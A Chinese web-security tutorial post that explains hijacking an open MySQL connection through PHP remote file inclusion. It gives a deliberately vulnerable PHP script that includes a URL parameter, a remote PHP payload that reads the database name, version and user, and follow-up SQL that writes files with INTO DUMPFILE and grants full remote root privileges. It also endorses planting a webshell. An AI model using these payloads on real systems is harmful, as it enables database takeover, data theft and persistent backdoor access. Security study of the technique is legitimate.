这是mysql_close 函数功能造成的 引用:http://php.net/manual/en/function.mysql-close.php mysql_close() closes the non-persistent connection to the MySQL server that’s associated with the specified link identifier. If link_identifier isn’t specified, the last opened link is used. Using mysql_close() isn’t usually necessary, as non-persistent open links are automatically closed at the end of the script’s execution. See also freeing resources. 通常不需要使用mysql_close(),因为已打开的非持久连接会在脚本执行完毕后自动关闭。 测试一下:mysql.php www.2cto.com <?php $host = "localhost"; $user = "root"; $pass = "rootpass"; $db = "test"; // Current $connect = mysql_connect($host,$user,$pass); mysql_select_db($db,$connect); $query = mysql_query("SELECT uname FROM admin"); while($lol = mysql_fetch_array($query)){ echo "we get it: ".$lol["uname"]."<br>"; } include($_GET["page"]); // SCRIPT HAVE RFI ?>本地: <?php $evil = mysql_query("SELECT concat_ws(0x3a,database(),version(),user());"); $a = mysql_fetch_array($evil); echo $a[0]; ?>当我们提交URL 发现本地的代码被远程主机执行了 在程序员写代码的时候,总喜欢吧连接 数据库 的文件单独,并且在其他文件涉及的时候包含他,例如 include([dbtabase.php]); 如果在渗透测试中发现一个 PHP 包含,并且include了数据库,我们就能操作他的数据库,或许可以做点其他事情 例如:SELECT ‘Hello World’INTO DUMPFILE ‘/tmp/test.txt’, 或者:GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’IDENTIFIED BY ‘pass’WITH GRANT OPTION; 当然直接包含个Webshell爽多了 参考: MySQL Session Hijacking over RFI http://www.dis9.com/wp-content/uploads/2012/03/ mysql .txt
查看更多关于MySQL Session Hijacking over RFI - 网站安全 - 自学php的详细内容...